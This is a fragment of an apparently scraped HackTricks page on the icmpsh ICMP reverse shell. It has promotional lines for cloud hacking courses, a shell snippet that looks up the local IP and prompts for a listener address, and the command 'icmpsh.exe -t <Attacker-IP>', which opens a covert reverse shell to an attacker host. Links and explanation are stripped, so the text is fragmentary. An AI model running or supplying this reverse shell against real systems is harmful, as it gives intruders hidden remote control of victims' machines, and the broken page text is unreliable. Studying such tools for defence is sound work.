Learn & practice AWS Hacking:
Learn & practice GCP Hacking:
Support HackTricks
Join the 💬 or the or follow us on Twitter 🐦 .
Share hacking tricks by submitting PRs to the and github repos.
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
echo Please insert the IP where you want to listen
read IP
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128